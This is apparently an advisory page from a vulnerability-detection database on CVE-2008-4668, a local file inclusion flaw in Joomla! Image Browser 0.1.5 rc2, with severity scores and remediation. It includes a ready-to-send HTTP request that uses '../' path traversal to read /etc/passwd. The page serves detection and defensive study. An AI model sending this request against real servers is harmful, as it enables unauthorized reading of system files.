🔙 목록으로 돌아가기

CVE-2008-4668: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion

TitleJoomla! Image Browser 0.1.5 rc2 - Local File Inclusion
Authordaffainfo
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
RemediationUpgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.
CVSS Score9
EPSS Score0.00144
CVE IDCVE-2008-4668
CWE IDCWE-22
Tags cve2008 cve joomla lfi edb vuln

🔍 Vulnerability Description

Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-4668.yaml

🦈 Packet Capture: ⬇️ Download cve-2008-4668.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A